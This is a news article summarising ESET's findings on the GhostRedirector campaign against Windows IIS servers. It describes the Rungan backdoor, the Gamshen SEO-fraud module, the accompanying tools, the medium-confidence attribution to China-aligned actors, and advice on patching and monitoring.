Cybersecurity researchers have exposed a previously undocumented threat cluster named GhostRedirector that has compromised at least 65 Windows servers, focused mainly in Brazil, Thailand and Vietnam. The operation centers on a passive C++ backdoor dubbed Rungan and an IIS module codenamed Gamshen, according to a report from Slovak cybersecurity firm ESET.
Initial access is believed to be gained by exploiting a vulnerability – likely an SQL injection flaw – and is followed by the use of PowerShell to deliver additional tools hosted on a staging server. ESET noted that most unauthorized PowerShell executions originated from the binary sqlserver.exe, a finding that aligns with activity linked to the same source.
Rungan is designed to await incoming requests from a URL matching a predefined pattern (for example, https://+:80/v1.0/8888/sys.html) and then executes the embedded commands. The backdoor supports four commands: mkuser (create a new user on the server), listfolder (retrieve information from a path), addurl (register new URLs for the backdoor to listen on), and cmd (run a command on the host using the CreateProcessA API).
Gamshen, written in C/C++, is associated with a class of IIS malware known as Group 13. The module can operate as both a backdoor and an agent for SEO fraud, intercepting HTTP requests made to sites hosted on the compromised server – specifically those from search engine crawlers – and altering responses to steer Googlebot visits toward a target site.
Researchers said GhostRedirector’s SEO fraud activity appears intended to manipulate search rankings by creating artificial backlinks from the compromised site to targeted websites, with potential use in promoting gambling-related content. While it remains unclear which destinations the manipulated backlinks redirect to, researchers warned the tactic could harm the reputation of compromised hosts.
In addition to Rungan and Gamshen, GhostRedirector dropped several other tools, including GoToHTTP (for remote access via a browser), BadPotato or EfsPotato (for creating privileged accounts in the Administrators group), and Zunput (for gathering site information and dropping web shells such as ASP, PHP and JavaScript).
The actors behind GhostRedirector are assessed with medium confidence to be China-aligned. ESET cited hard-coded Chinese strings in the source code, a code-signing certificate issued to Shenzhen Diyuan Technology Co., Ltd. to sign privilege-escalation artifacts, and the use of the password huang for a GhostRedirector-created user on a compromised server as indicators. The firm notes that this attribution is not definitive, and other China-linked threat activity has been observed in related campaigns.
The GhostRedirector campaign echoes earlier IIS-focused SEO fraud activity documented by security researchers. As with prior campaigns, the operators’ primary goal appears to be long-term access and monetization through manipulated search rankings rather than defeating regular site visitors. Analysts emphasized the need for prompt patching of exposed SQL injection surfaces, monitoring for unusual PowerShell activity, and auditing for rogue user accounts and newly registered URLs on affected IIS servers.